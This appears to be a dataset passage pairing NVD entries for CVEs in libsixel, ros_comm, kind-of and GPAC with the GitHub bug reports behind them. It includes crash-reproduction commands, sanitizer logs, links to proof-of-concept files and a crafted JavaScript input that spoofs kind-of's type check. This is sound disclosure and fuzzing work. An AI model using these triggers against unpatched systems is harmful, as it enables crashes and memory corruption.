ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==57335==ABORTING root@ubuntu:/home/tim/libsixel/converters# ```
heap overflow in fromgif.c:250
https://api.github.com/repos/saitoha/libsixel/issues/125/comments
4
2019-12-25T00:03:38Z
2020-01-03T01:32:47Z
https://github.com/saitoha/libsixel/issues/125
542,223,529
125
950
CVE-2019-20140
2019-12-30T17:15:20.560
An issue was discovered in libsixel 1.8.4. There is a heap-based buffer overflow in the function gif_out_code at fromgif.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "EB0720EA-8C4F-44BB-91C1-3098DA288118", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/saitoha/libsixel/issues/122
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
version : img2sixel 1.8.4 OS : Ubuntu 18.04 configured with: libcurl: yes libpng: yes libjpeg: yes gdk-pixbuf2: no GD: no There is a heap-buffer-overflow in gif_out_code at fromgif.c:278 please run following cmd to reproduce it. ``` img2sixel --high-color $PoC ``` [poc](https://drive.google.com/file/d/1tFy0Iozhl7-eqlAyBbAx39MzU-FM6uRq/view?usp=sharing) ASAN LOG ``` ==10277==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000480 at pc 0x7f7bdcc18b94 bp 0x7ffef64b2e60 sp 0x7ffef64b2e58 WRITE of size 1 at 0x619000000480 thread T0 #0 0x7f7bdcc18b93 in gif_out_code /home/tmp/libsixel/src/fromgif.c:278:48 #1 0x7f7bdcc075b5 in gif_process_raster /home/tmp/libsixel/src/fromgif.c:389:17 #2 0x7f7bdcc075b5 in gif_load_next /home/tmp/libsixel/src/fromgif.c:497 #3 0x7f7bdcc075b5 in load_gif /home/tmp/libsixel/src/fromgif.c:634 #4 0x7f7bdc9e96fb in load_with_builtin /home/tmp/libsixel/src/loader.c:888:18 #5 0x7f7bdc9e96fb in sixel_helper_load_image_file /home/tmp/libsixel/src/loader.c:1392 #6 0x7f7bdcc2d99f in sixel_encoder_encode /home/tmp/libsixel/src/encoder.c:1737:14 #7 0x51787f in main /home/tmp/libsixel/converters/img2sixel.c:457:22 #8 0x7f7bdaf93b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41a379 in _start (/home/tmp/img2sixel+0x41a379) 0x619000000480 is located 0 bytes to the right of 1024-byte region [0x619000000080,0x619000000480) allocated by thread T0 here: #0 0x4da230 in __interceptor_malloc (/home/tmp/img2sixel+0x4da230) #1 0x7f7bdcc00dd2 in load_gif /home/tmp/libsixel/src/fromgif.c:611:30 #2 0x7f7bdc9e96fb in load_with_builtin /home/tmp/libsixel/src/loader.c:888:18 #3 0x7f7bdc9e96fb in sixel_helper_load_image_file /home/tmp/libsixel/src/loader.c:1392 #4 0x7f7bdcc2d99f in sixel_encoder_encode /home/tmp/libsixel/src/encoder.c:1737:14 #5 0x51787f in main /home/tmp/libsixel/converters/img2sixel.c:457:22 #6 0x7f7bdaf93b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tmp/libsixel/src/fromgif.c:278:48 in gif_out_code Shadow bytes around the buggy address: 0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8090:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==10277==ABORTING ```
heap-buffer-overflow in gif_out_code at fromgif.c:278
https://api.github.com/repos/saitoha/libsixel/issues/122/comments
5
2019-12-22T13:23:47Z
2020-01-03T01:33:42Z
https://github.com/saitoha/libsixel/issues/122
541,450,421
122
951
CVE-2019-13445
2019-12-30T18:15:14.057
An issue was discovered in the ROS communications-related packages (aka ros_comm or ros-melodic-ros-comm) through 1.14.3. parseOptions() in tools/rosbag/src/record.cpp has an integer overflow when a crafted split option can be entered on the command line.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ros/ros_comm/blob/melodic-devel/tools/rosbag/src/record.cpp#L129" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ros/ros_comm/issues/1738" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ros/ros_comm/pull/1741" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ros/ros_comm/blob/melodic-devel/tools/rosbag/src/record.cpp#L129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ros/ros_comm/issues/1738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ros/ros_comm/pull/1741" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ros:ros-comm:*:*:*:*:*:*:*:*", "matchCriteriaId": "D0EBCB1B-9EB9-4FDC-B3FB-8ED23B84BC71", "versionEndExcluding": null, "versionEndIncluding": "1.14.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/ros/ros_comm/issues/1738
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ros", "ros_comm" ]
Potentially overflowing expression "1048576 * S" with type "int" (32 bits, signed) is evaluated using 32-bit arithmetic, and then used in a context that expects an expression of type "uint64_t" (64 bits, unsigned). https://github.com/ros/ros_comm/blob/29053c4832229efa7160fb944c05e3bc82e11540/tools/rosbag/src/record.cpp#L129 To avoid overflow, cast either "1048576" or "S" to type "uint64_t".
CVE-2019-13445: potential integer overflow
https://api.github.com/repos/ros/ros_comm/issues/1738/comments
0
2019-07-02T21:42:17Z
2019-07-16T18:43:40Z
https://github.com/ros/ros_comm/issues/1738
463,448,919
1,738
952
CVE-2019-20149
2019-12-30T19:15:11.910
ctorName in index.js in kind-of v6.0.2 allows external user input to overwrite certain internal attributes via a conflicting name, as demonstrated by 'constructor': {'name':'Symbol'}. Hence, a crafted payload can overwrite this builtin attribute to manipulate the type detection result.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jonschlinkert/kind-of/issues/30" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jonschlinkert/kind-of/pull/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jonschlinkert/kind-of/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jonschlinkert/kind-of/pull/31" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kind-of_project:kind-of:6.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "83563B75-503D-4746-8779-5FBAA4436F4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "668" ]
668
https://github.com/jonschlinkert/kind-of/issues/30
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jonschlinkert", "kind-of" ]
We found that a maliciously crafted user-input object can type checking result of kind-of module. The vulnerability is from the following code: kind-of leverages the built-in constructor of unsafe user-input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the type detection result. https://github.com/jonschlinkert/kind-of/blob/4da96c0047906d22a4d6964a668d3abaca122e50/index.js#L68-L70 Reproduce Script ``` var kindOf = require('kind-of'); var user_input = { user: 'barney', age: 36, active: true, "constructor":{"name":"Symbol"} }; console.log(kindOf(user_input)); ``` This issue can be fixed by adding one simply check to the ctorName() function: check `typeof val.constructor === function `. This check can patch the vulnerability because attackers can't use json to send function instances to the victim server.
type checking
https://api.github.com/repos/jonschlinkert/kind-of/issues/30/comments
4
2019-12-16T01:04:23Z
2020-01-16T17:02:05Z
https://github.com/jonschlinkert/kind-of/issues/30
538,136,244
30
953
CVE-2019-20159
2019-12-31T00:15:12.243
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a memory leak in dinf_New() in isomedia/box_code_base.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1321" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1321
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (master 6ada10e) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-memory-leak ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/POC-memory-leak ASAN info: ```C ==26273==ERROR: LeakSanitizer: detected memory leaks Direct leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad2eed in dinf_New isomedia/box_code_base.c:945 Indirect leak of 160 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x46c43a in realloc_chain utils/list.c:622 #2 0x46c43a in gf_list_add utils/list.c:629 Indirect leak of 96 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad1d0d in url_New isomedia/box_code_base.c:575 Indirect leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad318d in dref_New isomedia/box_code_base.c:1005 Indirect leak of 32 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x46c27d in gf_list_new utils/list.c:602 SUMMARY: AddressSanitizer: 448 byte(s) leaked in 10 allocation(s). ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: a memory leak of dinf_New()
https://api.github.com/repos/gpac/gpac/issues/1321/comments
2
2019-10-28T16:03:11Z
2020-01-08T12:43:28Z
https://github.com/gpac/gpac/issues/1321
513,400,465
1,321
954
CVE-2019-20160
2019-12-31T00:15:12.337
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a stack-based buffer overflow in the function av1_parse_tile_group() in media_tools/av_parsers.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1334" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1334
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-av1_parse_tile_group ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-av1_parse_tile_group gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000005a375b in av1_parse_tile_group () (gdb) bt #0 0x00000000005a375b in av1_parse_tile_group () #1 0x00000000005ad18b in gf_media_aom_av1_parse_obu () #2 0x00000000004fe4ce in av1c_Read () #3 0x000000010000100a in ?? () #4 0x000000010000100b in ?? () #5 0x000000010000100c in ?? () #6 0x000000010000100d in ?? () #7 0x000000010000100e in ?? () #8 0x000000010000100f in ?? () #9 0x0000000100001010 in ?? () #10 0x0000000100001011 in ?? () #11 0x0000000100001012 in ?? () #12 0x0000000100001013 in ?? () #13 0x0000000100001014 in ?? () ``` ASAN info: ```C [iso file] Box "dinf" (start 773) has 20 extra bytes [iso file] Missing DataInformationBox [iso file] Box "minf" (start 745) has 458 extra bytes [iso file] Box "mdia" is larger than container box [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Box "trak" size 264 (start 553) invalid (read 714) [iso file] Box "svcC" size 60 (start 919) invalid (read 126) [iso file] Box "avcC" (start 979) has 9 extra bytes [iso file] Box "avcC" (start 1003) has 81 extra bytes [iso file] extra box avcC found in avc1, deleting [iso file] Unknown box type av1C in parent avc1 [iso file] Unknown box type stsz in parent avc1 [iso file] Unknown box type stco in parent avc1 [iso file] Box "UNKN" is larger than container box [iso file] Box "avc1" size 402 (start 833) invalid (read 414) [iso file] Box "avc1" is larger than container box [iso file] Box "stsd" size 162 (start 817) invalid (read 418) [iso file] Box "avcC" (start 979) has 9 extra bytes [iso file] Box "avcC" (start 1003) has 81 extra bytes ================================================================= ==25824==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff8278 at pc 0x00000082ff06 bp 0x7ffffffef7a0 sp 0x7ffffffef790 WRITE of size 4 at 0x7fffffff8278 thread T0 #0 0x82ff05 in av1_parse_tile_group media_tools/av_parsers.c:3845 #1 0x840f2f in av1_parse_frame media_tools/av_parsers.c:3882 #2 0x840f2f in gf_media_aom_av1_parse_obu media_tools/av_parsers.c:3969 #3 0x69909c in av1c_Read isomedia/avc_ext.c:2651 #4 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #5 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #6 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #7 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #8 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #9 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #10 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #11 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) Address 0x7fffffff8278 is located in stack of thread T0 at offset 35160 in frame #0 0x69889f in av1c_Read isomedia/avc_ext.c:2608 This frame has 3 object(s): [32, 36) 'obu_type' [96, 104) 'obu_size' [160, 35112) 'state' <== Memory access at offset 35160 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow media_tools/av_parsers.c:3845 av1_parse_tile_group Shadow bytes around the buggy address: 0x10007fff6ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7040: 00 00 00 00 00 00 00 00 00 f4 f4 f4 f3 f3 f3[f3] 0x10007fff7050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 0x10007fff7060: f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00 00 00 00 00 0x10007fff7070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7090: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25824==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: stack-buffer-overflow in av1_parse_tile_group media_tools/av_parsers.c:3845
https://api.github.com/repos/gpac/gpac/issues/1334/comments
2
2019-11-09T11:22:06Z
2020-01-08T12:45:14Z
https://github.com/gpac/gpac/issues/1334
520,394,957
1,334
955
CVE-2019-20161
2019-12-31T00:15:12.417
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is heap-based buffer overflow in the function ReadGF_IPMPX_WatermarkingInit() in odf/ipmpx_code.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1320" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1320" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1320
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
